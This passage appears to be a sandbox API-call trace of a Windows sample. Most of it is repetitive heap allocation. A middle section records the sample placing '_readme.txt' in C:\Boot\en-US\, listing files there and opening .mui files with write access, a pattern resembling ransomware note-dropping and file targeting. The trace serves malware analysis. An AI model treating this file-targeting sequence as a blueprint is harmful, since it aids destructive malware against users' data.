RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.061] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0097.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.061] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.061] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.061] PathFindFileNameW (pszPath="") returned="" [0097.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.061] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.062] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.062] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0097.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.062] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.062] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0097.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.062] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0097.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.063] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa180cd80, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa180cd80, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.063] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa180cd80, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa180cd80, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.063] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.063] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\bootmgr.exe.mui") returned=".mui" [0097.063] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.063] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0097.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.063] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\memtest.exe.mui") returned=".mui" [0097.063] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.064] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa180cd80, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa180cd80, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa180cd80, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.064] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned=".txt" [0097.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.064] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa180cd80, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa180cd80, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa180cd80, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.064] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.064] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.064] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 